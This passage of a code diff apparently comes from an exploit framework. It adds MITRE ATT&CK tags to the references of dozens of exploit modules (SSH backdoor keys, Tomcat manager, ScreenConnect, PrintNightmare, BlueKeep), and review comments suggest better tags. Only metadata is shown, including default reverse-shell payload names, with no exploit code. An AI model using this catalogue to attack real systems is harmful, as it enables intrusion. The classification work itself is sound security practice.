+++ b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb
@@ -42,6 +42,7 @@ def initialize(info = {})
 'References' => [
 ['CVE', '2015-0936'],
 ['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure
+ ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH],
 ],
 'DisclosureDate' => '2015-04-01', # Not a joke
 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
diff --git a/modules/exploits/linux/ssh/exagrid_known_privkey.rb b/modules/exploits/linux/ssh/exagrid_known_privkey.rb
index 998634663839d..8a0b3b200d191 100644
--- a/modules/exploits/linux/ssh/exagrid_known_privkey.rb
+++ b/modules/exploits/linux/ssh/exagrid_known_privkey.rb
@@ -40,7 +40,8 @@ def initialize(info = {})
 'References' => [
 [ 'CVE', '2016-1560' ], # password
 [ 'CVE', '2016-1561' ], # private key
- [ 'URL', 'https://www.rapid7.com/blog/post/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ]
+ [ 'URL', 'https://www.rapid7.com/blog/post/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
 ],
 'DisclosureDate' => '2016-04-07',
 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
diff --git a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb
index 64125268d4d08..4d9a508626f11 100644
--- a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb
+++ b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb 
@@ -40,7 +40,8 @@ def initialize(info = {})
 [ 'URL', 'https://www.trustmatta.com/advisories/MATTA-2012-002.txt' ],
 [ 'CVE', '2012-1493' ],
 [ 'OSVDB', '82780' ],
- [ 'URL', 'https://www.rapid7.com/blog/post/2012/06/25/press-f5-for-root-shell' ]
+ [ 'URL', 'https://www.rapid7.com/blog/post/2012/06/25/press-f5-for-root-shell' ],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
 ],
 'DisclosureDate' => '2012-06-11',
 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
diff --git a/modules/exploits/linux/ssh/ibm_drm_a3user.rb b/modules/exploits/linux/ssh/ibm_drm_a3user.rb
index c6367baef5436..30e1b7c4044c8 100644
--- a/modules/exploits/linux/ssh/ibm_drm_a3user.rb
+++ b/modules/exploits/linux/ssh/ibm_drm_a3user.rb
@@ -28,7 +28,8 @@ def initialize(info = {})
 [ 'CVE', '2020-4429' ], # insecure default password
 [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md' ],
 [ 'URL', 'https://seclists.org/fulldisclosure/2020/Apr/33' ],
- [ 'URL', 'https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/']
+ [ 'URL', 'https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/'],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
 ],
 'Payload' => {
 'Compat' => {
diff --git a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb
index 26060244ed3c7..ac9083ba7b15b 100644
--- a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb
+++ b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb 
@@ -37,7 +37,8 @@ def initialize(info = {})
 'Author' => 'xistence ', # Discovery, Metasploit module
 'License' => MSF_LICENSE,
 'References' => [
- ['PACKETSTORM', '125754']
+ ['PACKETSTORM', '125754'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
 ],
 'DisclosureDate' => '2014-03-17',
 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
diff --git a/modules/exploits/linux/ssh/mercurial_ssh_exec.rb b/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
index 47cdebb13f9a8..8eecf438679eb 100644
--- a/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
+++ b/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
@@ -24,7 +24,8 @@ def initialize(info = {})
 ],
 'References' => [
 [ 'CVE', '2017-9462' ],
- ['URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29']
+ [ 'URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29' ],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
 ],
 'DefaultOptions' => {
 'Payload' => 'python/meterpreter/reverse_tcp'
diff --git a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb
index 30732a229fd4c..c8739dbd2f3ce 100644
--- a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb
+++ b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb
@@ -36,7 +36,8 @@ def initialize(info = {})
 'Author' => 'xistence ', # Discovery, Metasploit module
 'License' => MSF_LICENSE,
 'References' => [
- ['PACKETSTORM', '125755']
+ ['PACKETSTORM', '125755'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
 ],
 'DisclosureDate' => '2014-03-17',
 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
diff --git a/modules/exploits/linux/ssh/solarwinds_lem_exec.rb b/modules/exploits/linux/ssh/solarwinds_lem_exec.rb
index 13ba188eb9e7e..da03af4598f2e 100644
--- a/modules/exploits/linux/ssh/solarwinds_lem_exec.rb
+++ b/modules/exploits/linux/ssh/solarwinds_lem_exec.rb 
@@ -26,7 +26,8 @@ def initialize(info = {})
 ],
 'References' => [
 ['CVE', '2017-7722'],
- ['URL', 'http://web.archive.org/web/20250221015511/https://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/']
+ ['URL', 'http://web.archive.org/web/20250221015511/https://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
 ],
 'DefaultOptions' => {
 'Payload' => 'python/meterpreter/reverse_tcp'
diff --git a/modules/exploits/linux/ssh/ssh_erlangotp_rce.rb b/modules/exploits/linux/ssh/ssh_erlangotp_rce.rb
index 9bc3440168c45..359d62053c2b7 100644
--- a/modules/exploits/linux/ssh/ssh_erlangotp_rce.rb
+++ b/modules/exploits/linux/ssh/ssh_erlangotp_rce.rb
@@ -37,7 +37,8 @@ def initialize(info = {})
 ['CVE', '2025-32433'],
 ['URL', 'https://x.com/Horizon3Attack/status/1912945580902334793'],
 ['URL', 'https://platformsecurity.com/blog/CVE-2025-32433-poc'],
- ['URL', 'https://github.com/ProDefense/CVE-2025-32433']
+ ['URL', 'https://github.com/ProDefense/CVE-2025-32433'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
 ],
 'Platform' => ['linux', 'unix'],
 'Arch' => [ARCH_CMD],
diff --git a/modules/exploits/linux/ssh/symantec_smg_ssh.rb b/modules/exploits/linux/ssh/symantec_smg_ssh.rb
index f6c12aa36bfca..770f162a9cfb7 100644
--- a/modules/exploits/linux/ssh/symantec_smg_ssh.rb
+++ b/modules/exploits/linux/ssh/symantec_smg_ssh.rb 
@@ -31,7 +31,8 @@ def initialize(info = {})
 ['CVE', '2012-3579'],
 ['OSVDB', '85028'],
 ['BID', '55143'],
- ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00']
+ ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
 ],
 'DefaultOptions' => {
 'EXITFUNC' => 'thread'
diff --git a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb
index a9b3eefdff321..5b6c212de6b15 100644
--- a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb
+++ b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb
@@ -36,6 +36,7 @@ def initialize(info = {})
 'References' => [
 [ 'CVE', '2016-7456' ],
 [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ],
 ],
 'DisclosureDate' => '2016-12-20',
 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
diff --git a/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb b/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb
index 64dedec97d03c..87c70c42f094d 100644
--- a/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb
+++ b/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb
@@ -71,6 +71,7 @@ def initialize(info = {})
 ['URL', 'https://github.com/sinsinology/CVE-2023-34039'],
 ['URL', 'https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/'],
 ['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0018.html'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH],
 ],
 'DisclosureDate' => '2023-08-29',
 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
diff --git a/modules/exploits/linux/telnet/netgear_telnetenable.rb b/modules/exploits/linux/telnet/netgear_telnetenable.rb
index 110f9f47e1fbf..a3fefa92e70af 100644
--- a/modules/exploits/linux/telnet/netgear_telnetenable.rb
+++ b/modules/exploits/linux/telnet/netgear_telnetenable.rb
@@ -28,7 +28,8 @@ def initialize(info = {})
 'References' => [
 ['URL', 'https://wiki.openwrt.org/toh/netgear/telnet.console'],
 ['URL', 'https://github.com/cyanitol/netgear-telenetenable'],
- ['URL', 'https://github.com/insanid/netgear-telenetenable']
+ ['URL', 'https://github.com/insanid/netgear-telenetenable'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
 ],
 'DisclosureDate' => '2009-10-30', # Python PoC (TCP)
 'License' => MSF_LICENSE,
diff --git a/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb b/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb
index 3bf479a3ded6c..9af284f72a230 100644
--- a/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb
+++ b/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb
@@ -34,7 +34,8 @@ def initialize(info = {})
 ['CVE', '2024-21683'],
 ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-95832'],
 ['URL', 'https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated'],
- ['URL', 'https://github.com/W01fh4cker/CVE-2024-21683-RCE']
+ ['URL', 'https://github.com/W01fh4cker/CVE-2024-21683-RCE'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
 ],
 'DisclosureDate' => '2024-05-21',
 'Privileged' => false, # `NT AUTHORITY\NETWORK SERVICE` on Windows by default, `confluence` on Linux by default.
diff --git a/modules/exploits/multi/http/connectwise_screenconnect_rce_cve_2024_1709.rb b/modules/exploits/multi/http/connectwise_screenconnect_rce_cve_2024_1709.rb
index 3b9c4da47e112..50ba0d0e97718 100644
--- a/modules/exploits/multi/http/connectwise_screenconnect_rce_cve_2024_1709.rb
+++ b/modules/exploits/multi/http/connectwise_screenconnect_rce_cve_2024_1709.rb
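Review bot: The atlassian_confluence_rce_cve_2024_21683.rb hunk tags an HTTP application exploit with the generic `T1021_REMOTE_SERVICES`, which in ATT&CK covers interactive logon services such as SSH, RDP, SMB, VNC and WinRM; a code-execution bug in a web application is conventionally mapped to T1190 (Exploit Public-Facing Application) instead. The same generic tag is applied in connectwise_screenconnect_rce_cve_2024_1709.rb, glassfish_deployer.rb, orientdb_exec.rb, splunk_mappy_exec.rb, tomcat_mgr_deploy.rb, tomcat_mgr_upload.rb, remote_for_mac_rce.rb and nscp_authenticated_rce.rb, all under `http` module paths. If `Mitre::Attack::Technique` provides a T1190 constant, using it for those modules would leave the parent T1021 tag for modules that genuinely drive a remote-access protocol, such as the telnet modules in this change. Where the module needs application credentials (the Tomcat manager modules, per their manager-howto reference), T1078 (Valid Accounts) is the usual companion tag. The `initialize` body each array belongs to starts and ends outside the hunk.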
@@ -31,7 +31,8 @@ def initialize(info = {})
 ['CVE', '2024-1709'], # Auth bypass to create admin account.
 ['URL', 'https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8'], # Vendor Advisory
 ['URL', 'https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc/'], # Auth Bypass PoC
- ['URL', 'https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass'] # Analysis of both CVEs
+ ['URL', 'https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass'], # Analysis of both CVEs
+ ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
 ],
 'DisclosureDate' => '2024-02-19',
 'Platform' => %w[win linux unix],
diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb
index f9602859ab7a0..0d0623d4ab8cc 100644
--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -35,7 +35,8 @@ def initialize(info = {})
 ],
 'References' => [
 ['CVE', '2011-0807'],
- ['OSVDB', '71948']
+ ['OSVDB', '71948'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
 ],
 'Platform' => ['win', 'linux', 'java'],
 'Targets' => [
diff --git a/modules/exploits/multi/http/orientdb_exec.rb b/modules/exploits/multi/http/orientdb_exec.rb
index 13587a132deaf..f894530072295 100644
--- a/modules/exploits/multi/http/orientdb_exec.rb
+++ b/modules/exploits/multi/http/orientdb_exec.rb
@@ -27,7 +27,8 @@ def initialize(info = {})
 ['CVE', '2017-11467'],
 ['URL', 'https://blogs.securiteam.com/index.php/archives/3318'],
 ['URL', 'http://www.palada.net/index.php/2017/07/13/news-2112/'],
- ['URL', 'https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017']
+ ['URL', 'https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
 ],
 'Platform' => %w{linux unix win},
 'Privileged' => false,
diff --git a/modules/exploits/multi/http/splunk_mappy_exec.rb b/modules/exploits/multi/http/splunk_mappy_exec.rb
index 9746025f40aa0..4b89cc57dd85a 100644
--- a/modules/exploits/multi/http/splunk_mappy_exec.rb
+++ b/modules/exploits/multi/http/splunk_mappy_exec.rb
@@ -32,7 +32,8 @@ def initialize(info = {})
 [ 'BID', '51061' ],
 [ 'CVE', '2011-4642' ],
 [ 'URL', 'http://www.splunk.com/view/SP-CAAAGMM' ],
- [ 'URL', 'http://www.sec-1.com/blog/?p=233' ]
+ [ 'URL', 'http://www.sec-1.com/blog/?p=233' ],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
 ],
 'Payload' => {
 'Space' => 1024,
diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
index 952f1230cc484..791b77b1a38cb 100644
--- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb
+++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
@@ -57,7 +57,8 @@ def initialize(info = {})
 [ 'BID', '36954' ],
 
 # tomcat docs
- [ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ]
+ [ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
 ],
 'Platform' => %w{java linux win}, # others?
 'Targets' => [
diff --git a/modules/exploits/multi/http/tomcat_mgr_upload.rb b/modules/exploits/multi/http/tomcat_mgr_upload.rb
index 26e896fa58bd7..1530e752cba48 100644
--- a/modules/exploits/multi/http/tomcat_mgr_upload.rb
+++ b/modules/exploits/multi/http/tomcat_mgr_upload.rb
@@ -62,7 +62,8 @@ def initialize(info = {})
 ['BID', '36954'],
 
 # tomcat docs
- ['URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html']
+ ['URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES],
 ],
 'Platform' => %w{java linux win}, # others?
 'Targets' => [
diff --git a/modules/exploits/multi/misc/bmc_server_automation_rscd_nsh_rce.rb b/modules/exploits/multi/misc/bmc_server_automation_rscd_nsh_rce.rb
index a4d259e4a7c59..538d2cdb4938d 100644
--- a/modules/exploits/multi/misc/bmc_server_automation_rscd_nsh_rce.rb
+++ b/modules/exploits/multi/misc/bmc_server_automation_rscd_nsh_rce.rb
@@ -31,7 +31,8 @@ def initialize(info = {})
 ['URL', 'https://nickbloor.co.uk/2018/01/01/rce-with-bmc-server-automation/'],
 ['URL', 'https://nickbloor.co.uk/2018/01/08/improving-the-bmc-rscd-rce-exploit/'],
 ['CVE', '2016-1542'],
- ['CVE', '2016-1543']
+ ['CVE', '2016-1543'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
 ],
 'DisclosureDate' => '2016-03-16',
 'Privileged' => false,
diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb
index 9b712a521964b..7868e341e8f1d 100644
--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -21,7 +21,8 @@ def initialize
 ),
 'Author' => ['Spencer McIntyre', 'Brandon Knight'],
 'References' => [
- [ 'CVE', '1999-0502'] # Weak password
+ [ 'CVE', '1999-0502'], # Weak password
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
 ],
 'License' => MSF_LICENSE,
 'Privileged' => true,
diff --git a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
index 089a3bade8095..28b21907fda29 100644
--- a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
+++ b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
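Review bot: The tomcat_mgr_upload.rb hunk introduces a trailing comma on the new last element, `['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES],`, in an array whose previous last element had none, while the sibling tomcat_mgr_deploy.rb hunk in the same change adds the same entry without one. Pick one form for both files; dropping the comma, `['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]`, matches the array's existing style and the deploy module. The surrounding `initialize` body starts and ends outside the hunk.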
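Review bot: In the sshexec.rb hunk the new line `[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]` pads both brackets while the line it follows, `[ 'CVE', '1999-0502'], # Weak password`, pads only the opening one, so two adjacent entries now use different bracket spacing; the same mismatch appears in vnc_keyboard_exec.rb, powershell_remoting.rb and wmi.rb. Either follow the existing line, `[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]`, or normalise the whole array in one go, since RuboCop's Layout/SpaceInsideArrayLiteralBrackets reports mixed spacing within a literal when it is enabled for modules. The `initialize` method containing the array starts and ends outside the hunk.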
@@ -34,7 +34,8 @@ def initialize(info = {})
 [ 'VNC Linux / Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
 ],
 'References' => [
- [ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/']
+ [ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/'],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ]
 ],
 'DisclosureDate' => '2015-07-10',
 'DefaultTarget' => 0,
diff --git a/modules/exploits/osx/http/remote_for_mac_rce.rb b/modules/exploits/osx/http/remote_for_mac_rce.rb
index bf0cfed03f708..fa082a92b5c34 100644
--- a/modules/exploits/osx/http/remote_for_mac_rce.rb
+++ b/modules/exploits/osx/http/remote_for_mac_rce.rb
@@ -22,7 +22,8 @@ def initialize(info = {})
 'Author' => ['Chokri Hammedi (@blue0x1)'],
 'References' => [
 ['CVE', '2025-34089'],
- ['PACKETSTORM', '195347']
+ ['PACKETSTORM', '195347'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
 ],
 'DisclosureDate' => '2025-05-27',
 'Platform' => ['unix', 'osx'],
diff --git a/modules/exploits/solaris/telnet/fuser.rb b/modules/exploits/solaris/telnet/fuser.rb
index 88f8fb932a751..21ac02d28955e 100644
--- a/modules/exploits/solaris/telnet/fuser.rb
+++ b/modules/exploits/solaris/telnet/fuser.rb
@@ -23,6 +23,7 @@ def initialize(info = {})
 [ 'CVE', '2007-0882' ],
 [ 'OSVDB', '31881'],
 [ 'BID', '22512' ],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ],
 ],
 'Privileged' => false,
 'Platform' => %w[solaris unix],
diff --git a/modules/exploits/solaris/telnet/ttyprompt.rb b/modules/exploits/solaris/telnet/ttyprompt.rb
index 1dced18ec3a65..ba3fe5cb3f065 100644
--- a/modules/exploits/solaris/telnet/ttyprompt.rb
+++ b/modules/exploits/solaris/telnet/ttyprompt.rb
@@ -23,6 +23,7 @@ def initialize(info = {})
 ['CVE', '2001-0797'],
 ['OSVDB', '690'],
 ['BID', '5531'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES],
 ],
 'Privileged' => false,
 'Platform' => %w[solaris unix],
diff --git a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb
index 8e29a8e5df6bd..521d55688b63c 100644
--- a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb
+++ b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb
@@ -33,7 +33,8 @@ def initialize(info = {})
 ['CVE', '2012-5975'],
 ['EDB', '23082'],
 ['OSVDB', '88103'],
- ['URL', 'https://seclists.org/fulldisclosure/2012/Dec/12']
+ ['URL', 'https://seclists.org/fulldisclosure/2012/Dec/12'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
 ],
 'Payload' => {
 'Compat' =>
diff --git a/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb b/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb
index 3d0515a6496c6..c8307a779fa88 100644
--- a/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb
+++ b/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb
@@ -61,7 +61,8 @@ def initialize(info = {})
 ['URL', 'https://github.com/cube0x0/CVE-2021-1675'],
 ['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'],
 ['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'],
- ['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream']
+ ['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]
 ],
 'Notes' => {
 'AKA' => [ 'PrintNightmare' ],
diff --git a/modules/exploits/windows/http/nscp_authenticated_rce.rb b/modules/exploits/windows/http/nscp_authenticated_rce.rb
index 7f36aeff457ae..c2af1caa32e25 100644
--- a/modules/exploits/windows/http/nscp_authenticated_rce.rb
+++ b/modules/exploits/windows/http/nscp_authenticated_rce.rb
@@ -30,7 +30,8 @@ def initialize(info = {})
 ],
 'References' => [
 ['CVE', '2025-34079'],
- ['EDB', '48360']
+ ['EDB', '48360'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
 ],
 'Platform' => %w[windows],
 'Arch' => [ARCH_X64],
diff --git a/modules/exploits/windows/imap/mercury_login.rb b/modules/exploits/windows/imap/mercury_login.rb
index 419413893ab98..710e06b96ea74 100644
--- a/modules/exploits/windows/imap/mercury_login.rb
+++ b/modules/exploits/windows/imap/mercury_login.rb
@@ -29,7 +29,8 @@ def initialize(info = {})
 'License' => MSF_LICENSE,
 'References' => [
 ['CVE', '2007-1373'],
- ['EDB', '3418']
+ ['EDB', '3418'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
 ],
 'Privileged' => true,
 'DefaultOptions' => {
diff --git a/modules/exploits/windows/local/powershell_remoting.rb b/modules/exploits/windows/local/powershell_remoting.rb
index e09a7fde86ba7..b38bb899e7f4c 100644
--- a/modules/exploits/windows/local/powershell_remoting.rb
+++ b/modules/exploits/windows/local/powershell_remoting.rb
@@ -22,7 +22,8 @@ def initialize(info = {})
 'Author' => [ 'Ben Campbell' ],
 'References' => [
 [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
- [ 'OSVDB', '3106']
+ [ 'OSVDB', '3106'],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ]
 ],
 'DefaultOptions' => {
 'EXITFUNC' => 'thread'
diff --git a/modules/exploits/windows/local/wmi.rb b/modules/exploits/windows/local/wmi.rb
index 61321d6a26fee..a97682ba5e921 100644
--- a/modules/exploits/windows/local/wmi.rb
+++ b/modules/exploits/windows/local/wmi.rb
@@ -37,6 +37,7 @@ def initialize(info = {})
 [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
 [ 'OSVDB', '3106'],
 [ 'URL', 'http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html' ],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ],
 ],
 'DefaultOptions' => {
 'EXITFUNC' => 'thread',
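Review bot: The wmi.rb hunk uses the generic parent `T1021_REMOTE_SERVICES` for a module whose path and WMIS/PowerSploit reference point at command execution over WMI, and ATT&CK has a dedicated technique for exactly that, T1047 (Windows Management Instrumentation). The sibling powershell_remoting.rb hunk on this same line already picks the specific `T1021_006_WINDOWS_REMOTE_MANAGEMENT`, so the WMI module is the one left with the least precise tag. If `Mitre::Attack::Technique` defines a T1047 constant, swap it in for the parent technique here; if it does not, adding one would be a small follow-up. The `initialize` body that holds this array starts and ends outside the hunk.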
diff --git a/modules/exploits/windows/misc/unified_remote_rce.rb b/modules/exploits/windows/misc/unified_remote_rce.rb
index 44d3e52e28344..6c694585a99f8 100644
--- a/modules/exploits/windows/misc/unified_remote_rce.rb
+++ b/modules/exploits/windows/misc/unified_remote_rce.rb
@@ -37,7 +37,8 @@ def initialize(info = {})
 [ 'EDB', '49587' ],
 [ 'URL', 'https://www.unifiedremote.com/' ],
 [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/unified%20remote/unified-remote-rce.py' ],
- [ 'CVE', '2022-3229' ]
+ [ 'CVE', '2022-3229' ],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
 ],
 'Arch' => [ ARCH_X64, ARCH_X86 ],
 'Platform' => 'win',
diff --git a/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb b/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
index d5aedddd75508..ea4eacaab03b3 100644
--- a/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
+++ b/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
@@ -95,7 +95,8 @@ def initialize(info = {})
 ['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'],
 ['URL', 'https://zerosum0x0.blogspot.com/2019/11/fixing-remote-windows-kernel-payloads-meltdown.html'],
 ['ATT&CK', Mitre::Attack::Technique::T1059_COMMAND_AND_SCRIPTING_INTERPRETER],
- ['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION]
+ ['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_001_REMOTE_DESKTOP_PROTOCOL]
 ],
 'DefaultOptions' => {
 'RDP_CLIENT_NAME' => 'ethdev',
diff --git a/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb b/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
index fd4bdc38ea8d1..24dd343da39f3 100644
--- a/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
+++ b/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
@@ -32,7 +32,8 @@ def initialize(info = {})
 'Spencer McIntyre' # RDP DOPU analysis
 ],
 'References' => [
- ['URL', 'https://github.com/countercept/doublepulsar-detection-script']
+ ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],
